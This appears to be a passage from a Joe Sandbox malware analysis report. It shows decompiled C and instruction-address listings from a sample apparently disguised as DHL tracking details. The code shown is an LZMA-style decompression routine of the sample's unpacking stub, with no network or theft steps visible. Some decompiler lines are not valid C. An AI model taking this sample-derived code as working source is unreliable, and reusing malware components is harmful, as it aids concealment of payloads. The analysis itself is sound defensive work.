							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                    0x00405ead
                    0x00405eb4
                    0x00405eba
                    0x00405ec0
                    0x00000000
                    0x00405ec4
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405ee6
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efb
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f46
                    0x00405f49
                    0x00405f71
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4b
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f63
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fba
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fbf
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fdc
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406022
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066ca
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406700
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406709
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x00000000
                    0x004068bc
                    0x00406719
                    0x00406720
                    0x00406728
                    0x00406728
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x00000000
                    0x004060d9
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x004060bc
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x00000000
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x00406424
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x004068d2
                    0x004068d8
                    0x004068da
                    0x004068e1
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                    • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                    • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                    • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
